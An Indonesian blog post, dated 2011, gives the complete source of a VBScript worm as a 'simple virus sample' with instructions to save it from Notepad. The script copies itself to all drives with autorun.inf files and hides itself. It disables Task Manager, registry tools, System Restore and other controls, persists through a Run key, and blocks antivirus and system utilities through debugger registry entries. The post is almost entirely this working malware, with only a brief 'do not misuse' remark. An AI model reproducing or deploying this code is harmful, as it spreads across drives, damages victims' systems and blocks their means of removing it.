Membuat Sampel Script Virus Sederhana Dengan Notepad

Posted: Januari 11, 2011 in tips & trik

– buka notepad
-copy paste script dibawah
-simpan dengan nama mila.sys.vbs

on error resume next

dim rekur,syspath,windowpath,desades,
longka,mf,isi,tf,F0nAb0530,nt,check,sd

isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe Mila.sys.vbs”

set longka = createobject(“Scripting.FileSystemObject”)

set mf = longka.getfile(Wscript.ScriptFullname)

dim text,size

size = mf.size

check = mf.drive.drivetype

set text = mf.openastextstream(1,-2)

do while not text.atendofstream

rekur = rekur & text.readline

rekur = rekur & vbcrlf

loop

do

Set windowpath = longka.getspecialfolder(0)

Set syspath = longka.getspecialfolder(1)

set tf = longka.getfile(syspath & “\recycle.vbs”)

tf.attributes = 32

set tf = longka.createtextfile(syspath & “\recycle.vbs”,2,true)

tf.write rekur

tf.close

set tf = longka.getfile(syspath & “\recycle.vbs”)

tf.attributes = 39

for each desades in longka.drives

If (desades.drivetype = 1 or desades.drivetype = 2) and desades.path “A:” then

set tf=longka.getfile(desades.path &”\Mila.sys.vbs”)

tf.attributes =32

set tf=longka.createtextfile(desades.path &”\Mila.sys.vbs”,2,true)

tf.write rekur

tf.close

set tf=longka.getfile(desades.path &”\Mila.sys.vbs”)

tf.attributes = 39

set tf =longka.getfile(desades.path &”\autorun.inf”)

tf.attributes = 32

set tf=longka.createtextfile(desades.path &”\autorun.inf”,2,true)

tf.write isi

tf.close

set tf = longka.getfile(desades.path &”\autorun.inf”)

tf.attributes=39

end if

next

set F0nAb0530 = createobject(“WScript.Shell”)

F0nAb0530.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,”:: F0nA ::”

F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”,2, “REG_DWORD”

F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD”

F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″, “REG_DWORD”

F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD”

F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″, “REG_DWORD”

F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”

F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD”

F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu”, “1″, “REG_DWORD”

F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop\NoChangingWallpaper”, “1″, “REG_DWORD”

F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWinKeys”, “1″, “REG_DWORD”

F0nAb0530.RegWrite “HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore\DisableSR”, “1″, “REG_DWORD”

F0nAb0530.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff”, “1″, “REG_DWORD”

F0nAb0530.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel”, “1″, “REG_DWORD”

F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a”, “F0nAb0530-X2/1″

F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\MRUList”, “a”

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “F0nAb0530-X2″

F0nAb0530.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText”, “Aku Sayang Mila”

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Ageia”, syspath & “\recycle.vbs”

F0nAb0530.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page”, “http://www.macancrew.net”

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wordpad.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\VB6.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autorun.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ansav.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\viremoval.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\viremover.exe\Debugger”,”“

if check 1 then

Wscript.sleep 200000

end if

loop while check 1

set sd = createobject(“Wscript.shell”)

sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname

NB :
– jangan disalahgunakan
– maaf kalau pernah diposting dalam blog ini
– kalau mau buat anti virusnya tinggal di modifikasi nilainya….
courtesy : smile_netstar@yahoo.com

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s